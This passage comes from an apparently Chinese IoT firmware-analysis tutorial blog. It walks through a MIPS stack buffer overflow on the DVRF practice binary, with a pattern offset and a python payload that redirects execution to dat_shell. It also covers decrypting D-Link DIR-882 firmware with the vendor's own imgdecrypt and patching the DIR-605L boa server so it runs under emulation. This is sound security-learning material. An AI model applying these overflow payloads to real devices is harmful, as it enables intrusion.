<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> DVRF/Pwnable Source/Intro/stack_bof_01.c<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/8.png" srcset="/img/loading.gif" lazyload alt="8"></p>
<p>以调试的方式启动 stack_bof_01，在本地的 1234 端口监听调试。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> <span class="hljs-built_in">chroot</span> . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/9.png" srcset="/img/loading.gif" lazyload alt="9"></p>
<p>运行以下命令开始调试。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">gdb-multiarch pwnable<span class="hljs-regexp">/Intro/</span>stack_bof_01<br></code></pre></td></tr></table></figure>

<p>gdb 运行后，会自动加载 gef 插件，然后设置固件架构为 mips。</p>
<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gams"><span class="hljs-keyword">set</span> architecture <span class="hljs-comment">mips</span><br></code></pre></td></tr></table></figure>

<p>设置完远程调试的 IP 和端口，就可开始调试 stack_bof_01 程序了。</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">target</span> remote <span class="hljs-number">127.0.0.1:1234</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/10.png" srcset="/img/loading.gif" lazyload alt="10"></p>
<p>调用命令查看样本的所有函数，可以看到各个函数的地址。</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs pgsql"><span class="hljs-keyword">info</span> <span class="hljs-keyword">functions</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/11.png" srcset="/img/loading.gif" lazyload alt="11"></p>
<p>如果你感兴趣，可以使用命令查反汇编看下 main 函数的汇编码，这是 mips 架构的汇编码，跟 x86 的相差很大，完全看不懂。。</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css">disass <span class="hljs-selector-tag">main</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/12.png" srcset="/img/loading.gif" lazyload alt="12"></p>
<p>然后我们使用命令创建一个随机的 300 字节流，作为攻击字符串，用于测试参数溢出的点。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">pattern</span> <span class="hljs-keyword">create</span> <span class="hljs-number">300</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/13.png" srcset="/img/loading.gif" lazyload alt="13"></p>
<p>重新带参数调试 stack_bof_01。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> <span class="hljs-built_in">chroot</span> . ./qemu-mipsel-static -g 1234 ./pwnable/Intro/stack_bof_01 aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/14.png" srcset="/img/loading.gif" lazyload alt="14"></p>
<p>gdb 挂上去后，输入 c 回车让程序跑起来，会发现程序崩溃了，SIGSEGV 内存出错，指针 ra 指向 0x63616162，对应的 ASCII 是”baac”。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/15.png" srcset="/img/loading.gif" lazyload alt="15"></p>
<p>使用命令查看该溢出点在攻击字符串的什么位置，是位于 pattern 的第 204 位。</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs sql"><span class="hljs-keyword">pattern</span> <span class="hljs-keyword">search</span> <span class="hljs-number">0x63616162</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/15.png" srcset="/img/loading.gif" lazyload alt="15"><br>然后反汇编 dat_shell 函数，查看其函数地址，我们的目的是要让程序本来执行 0x63616162，变成执行 dat_shell 的地址，理论上应该把 0x63616162 改成 0x400950，但书上说要略过前 3 条 gp 相关的指令，我也不知道为啥，有兴趣的同学 google 下吧。</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">disass dat_shell</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/16.png" srcset="/img/loading.gif" lazyload alt="16"></p>
<p>将待执行的函数地址拼凑到 204 个字节后面，便可劫持程序执行流到 dat_shell 函数（0x40095C）,从而实现缓冲区溢出攻击。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> <span class="hljs-built_in">chroot</span> . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 <span class="hljs-string">&quot;<span class="hljs-subst">$(python -c <span class="hljs-string">&quot;print &#x27;A&#x27;*204 + &#x27;\x5c\x09\x40&#x27;&quot;</span>)</span>&quot;</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/17.png" srcset="/img/loading.gif" lazyload alt="17"></p>
<p>最后，试了下 0x400950 确实不行，会报错。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> <span class="hljs-built_in">chroot</span> . ./qemu-mipsel-static ./pwnable/Intro/stack_bof_01 <span class="hljs-string">&quot;<span class="hljs-subst">$(python -c <span class="hljs-string">&quot;print &#x27;A&#x27;*204 + &#x27;\x50\x09\x40&#x27;&quot;</span>)</span>&quot;</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/03-%E5%8A%A8%E6%80%81%E5%88%86%E6%9E%90IoT%E5%9B%BA%E4%BB%B6/18.png" srcset="/img/loading.gif" lazyload alt="18"></p>
<h1 id="04-解密-dlink-固件"><a href="#04-解密-dlink-固件" class="headerlink" title="04 解密 dlink 固件"></a>04 解密 dlink 固件</h1><p>本次我们要研究的是路由器 Dlink-882 的固件，下载地址在：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">ftp:<span class="hljs-regexp">//</span>ftp2.dlink.com<span class="hljs-regexp">/PRODUCTS/</span>DIR-<span class="hljs-number">882</span><span class="hljs-regexp">/REVA/</span>，其中的zip文件就是各版本的固件。<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<p>解压出来的固件版本从旧到新依次为：</p>
<figure class="highlight brainfuck"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs brainfuck"><span class="hljs-comment">FW100B07</span> <span class="hljs-literal">--</span>&gt; <span class="hljs-comment">FW101B02</span> <span class="hljs-literal">--</span>&gt; <span class="hljs-comment">FW104B02</span> <span class="hljs-literal">--</span>&gt; <span class="hljs-comment">FW110B02</span> <span class="hljs-literal">--</span>&gt; <span class="hljs-comment">FW111B01</span> <span class="hljs-literal">--</span>&gt; <span class="hljs-comment">FW120B06</span> <span class="hljs-literal">--</span>&gt; <span class="hljs-comment">FW130B10</span><br></code></pre></td></tr></table></figure>

<p>其中下图标记的两个固件是打包在同一个 zip 固件包中的，这里大家应该可以察觉到，FW104B02 有点特别，而且通过名字我们也猜测到它是未加密的中间版本。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<p>目前最新的版本是 FW130B10，通过 binwalk 进行解析，会发现该固件被加密了，binwalk 无法解析。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>再来看下最早版本的固件 FW100B07，使用 binwalk 解析是能直接提取的，没有被加密过。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/4.png" srcset="/img/loading.gif" lazyload alt="4"></p>
<p>综上，我们得知了，固件版本迭代的过程经历了固件未加密到固件加密，说明中间肯定有个中间版本（类似下图 V 2.0），下图是固件从未加密到加密的升级原理图。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/5.png" srcset="/img/loading.gif" lazyload alt="5"></p>
<p>从 binwalk 解析结果来看，能确定 FW100B07、FW101B02、FW104B02 是未加密的，而 FW104B02 之后的版本，FW110B02、FW111B01、FW120B06、FW130B10 均是加密的，那么 FW104B02 就可以确定是中间版本了。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/6.png" srcset="/img/loading.gif" lazyload alt="6"></p>
<p>确定了 FW104B02 是中间版本后，我们大概率可以从 FW104B02 的固件系统中找到解密程序了，方法是在&#x2F;bin 和&#x2F;usr&#x2F;bin 目录下寻找 decrypt 字样的程序，很幸运，我们在 bin 目录下找到了 imgdecrypt，这个程序猜测就是解密程序了。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/7.png" srcset="/img/loading.gif" lazyload alt="7"></p>
<p>对比下最早版本的 FW100B07 版本，&#x2F;bin 目录下就没有 imgdecrypt 程序。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/8.png" srcset="/img/loading.gif" lazyload alt="8"></p>
<p>接下来就可以分析下 imgdecrypt 的加密逻辑了，看下如何破解加密的固件，通过 file 命令，我们得知该程序是 MIPS 架构的可执行文件。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/9.png" srcset="/img/loading.gif" lazyload alt="9"></p>
<p>使用 IDA 分析，好吧，完全看不懂，放弃了。。这个是 mips 的汇编指令，跟 x86 汇编的语法不一样，感兴趣的同学可以学一下。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/10.png" srcset="/img/loading.gif" lazyload alt="10"></p>
<p>简单地从导入表中看下函数，发现有 RSA、AES，看来是较复杂的加密方式，不是简单的异或运算，头疼。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/11.png" srcset="/img/loading.gif" lazyload alt="11"></p>
<p>既然逆向不出加密算法，是不是就没办法解加密固件了呢？并不是，我们可以直接本地运行解密程序 imgdecrypt，来解被加密的 FW120806 固件。由于该程序是 mips 架构的，还得借助 qemu-mipsel-static 模拟器来运行。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/12.png" srcset="/img/loading.gif" lazyload alt="12"></p>
<p>使用 qemu-mipsel-static 之前要用 chroot 将当前固件系统路径设置为 root 路径，不然会提示缺少一些系统库（找不到库路径）。下图，我们就模拟运行 imgdecrypt 成功了，程序用法很简单，参数提供待解密的固件路径就行了。加密成功后，用 binwalk 就能解析出固件的系统结构了，进而提取固件系统。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/13.png" srcset="/img/loading.gif" lazyload alt="13"></p>
<p>同样的，最新的 FW130B10 版本也能通过该程序进行解密，按照这个逻辑，可能 Dlink 的其他系列路由器也能通过 imgdecrypt 解密，大家可以去试一下。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/04-%E8%A7%A3%E5%AF%86dlink%E5%9B%BA%E4%BB%B6/14.png" srcset="/img/loading.gif" lazyload alt="14"></p>
<h1 id="05-修复固件运行环境"><a href="#05-修复固件运行环境" class="headerlink" title="05-修复固件运行环境"></a>05-修复固件运行环境</h1><p>之前我们学习了如何模拟运行 IoT 固件，但是，现实中并不是所有固件都能模拟运行成功，比如固件运行可能依赖于硬件，qemu 无法完全模拟，所以，本节我们就来学习如何修复固件的运行环境，从而成功模拟固件运行。</p>
<p>我们本次使用的固件是 D-Link 的 DIR-605L FW_113 固件，下载地址：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">ftp:<span class="hljs-regexp">//</span>ftp2.dlink.com<span class="hljs-regexp">/PRODUCTS/</span>DIR-<span class="hljs-number">605</span>L<span class="hljs-regexp">/REVA/</span><br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/1.png" srcset="/img/loading.gif" lazyload alt="1"></p>
<p>拿到固件后，我们惯用的使用 fat 工具进行模拟，会发现它报错了，Interfaces 那里也为空，说明模拟运行失败了。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/2.png" srcset="/img/loading.gif" lazyload alt="2"></p>
<p>上 github 上查询该错误，作者无奈地回复说其实不是所有固件都能用 firmadyne 模拟的，尤其是那些需要与硬件设备交互的固件。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/3.png" srcset="/img/loading.gif" lazyload alt="3"></p>
<p>好，那就换种思路，模拟固件运行的实质其实就是把固件的 Web 程序跑起来，而模拟失败则说明 Web 程序运行出错了，我们接下来就要针对看看 Web 程序报错的原因以及如何修复运行环境。首先用 binwalk 提取固件的文件系统，提取出来的路径为 squashfs-root-0。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/4.png" srcset="/img/loading.gif" lazyload alt="4"></p>
<p>我们可以使用 find .&#x2F; -name boa 命令来定位该固件的 Web 程序。Boa 程序是一个轻量级的 web 服务器程序，常见于嵌入式系统中。dlink 就是在 boa 开源代码的基础上新增了很多功能接口以实现路由器上的不同功能。boa 程序的路径为&#x2F;bin&#x2F;boa，同时我们发现在&#x2F;etc&#x2F;boa 路径下还有个 boa 的密码配置文件，我们可以直接获取到 boa 加密后的密码。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/5.png" srcset="/img/loading.gif" lazyload alt="5"></p>
<p>我们直接使用命令模拟运行程序，会发现报错了，提示初始化 MIB 错误。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> <span class="hljs-built_in">chroot</span> . ./qemu-mips-static bin/boa<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/6.png" srcset="/img/loading.gif" lazyload alt="6"></p>
<p>使用 IDA 对 boa 程序进行逆向分析（需要先添加 mip 插件：<a target="_blank" rel="noopener" href="https://github.com/devttys0/ida%EF%BC%89%EF%BC%8C%E5%AE%9A%E4%BD%8D%E5%88%B0%E5%AD%97%E7%AC%A6%E4%B8%B2%E2%80%9CInitialize">https://github.com/devttys0/ida），定位到字符串“Initialize</a> AP MIB failed”，接下来就在这里下断点，调试看下什么情况下会报这个错。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/7.png" srcset="/img/loading.gif" lazyload alt="7"></p>
<p>首先使用 qemu 调试命令运行 boa 程序。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/8.png" srcset="/img/loading.gif" lazyload alt="8"></p>
<p>然后在用 ida 打开 boa 程序，选择 Debugger 为 Remote GDB（我这里是远程调试 129 虚拟机里的 boa 程序），点击 Debugger -&gt; Process Options 进行配置 IP 和端口。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/9.png" srcset="/img/loading.gif" lazyload alt="9"></p>
<p>然后点击 Debugger -&gt; Attach to process 附加调试，直接运行到断点处，这里的 jalr 命令即为调用 apmib_init 函数。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/10.png" srcset="/img/loading.gif" lazyload alt="10"></p>
<p>google 下这个这个函数是干嘛的，原来是从 flash 中读取 mib 值到 RAM 中，模拟环境没有 flash 硬件，所以应该会读取失败。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/11.png" srcset="/img/loading.gif" lazyload alt="11"></p>
<p>经过调试，我们知道由于没有 flash 硬件，apmib_init 读取数据失败返回 0，赋值给%v0，然后 bnez 命令对$v0 进行检测，若为 0，则回显初始化失败，报错退出。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/12.png" srcset="/img/loading.gif" lazyload alt="12"></p>
<p>我直接在 IDA 中对字节码进行修改，将 bnez(0x14)命令改成 beqz(0x10)，就可以进入正常的逻辑顺利运行下去了。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/13.png" srcset="/img/loading.gif" lazyload alt="13"></p>
<p>patch 完程序后，再次运行 boa，发现它不再报“Initialize AP MIB failed”错误了，但又来了 2 个“Create chklist file error!”错误以及一个内存崩溃错误。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/14.png" srcset="/img/loading.gif" lazyload alt="14"></p>
<p>前 2 个“Create chklist file error!”来自于 create_chklist_file 和 create_devInfo_file 函数，后面那个内存崩溃是 apmib_get 函数导致的。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/15.png" srcset="/img/loading.gif" lazyload alt="15"></p>
<p>定位到“Create chklist file error!”字符串，经分析确认这个错误是 open 函数的返回值导致，但由于不影响执行我们就细看了。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/16.png" srcset="/img/loading.gif" lazyload alt="16"></p>
<p>重点放到 apmib_get 函数，从上面我们可以知道该函数的功能是从 RAM 读取 MIB 值，所以有可能又是硬件依赖导致的错误。该函数正常情况下会返回 4 种值。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/17.png" srcset="/img/loading.gif" lazyload alt="17"></p>
<p>由于代码复杂，我们就不细致分析了，直接参考作者的代码编写劫持代码，目的是伪造 apmib_init 和 apmib_get 函数，让其返回正确的值，由于为了方便 IDA 调试，作者把 fork 也一并劫持了（IDA 遇到 fork 异常）。</p>
<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/18.png" srcset="/img/loading.gif" lazyload alt="18"></p>
<p>编写好 apmib.c 后，使用 mips-linux-gnu-gcc 命令将该代码编译成 so，在这之前得先下载 mips 的 gcc。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">sudo</span> apt install gcc-mips-linux-gnu<br></code></pre></td></tr></table></figure>

<p>然后使用命令进行编译。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs angelscript">mips-linux-gnu-gcc -Wall fPIC -<span class="hljs-keyword">shared</span> apmib.c -o apmib-ld.so<br></code></pre></td></tr></table></figure>

<p><img src="/2022/12/20/IOT%E5%AE%89%E5%85%A8/IOT%E5%9B%BA%E4%BB%B6%E5%88%86%E6%9E%90%E5%85%A5%E9%97%A8/05-%E4%BF%AE%E5%A4%8D%E5%9B%BA%E4%BB%B6%E8%BF%90%E8%A1%8C%E7%8E%AF%E5%A2%83/pic/19.png" srcset="/img/loading.gif" lazyload alt="19"></p>
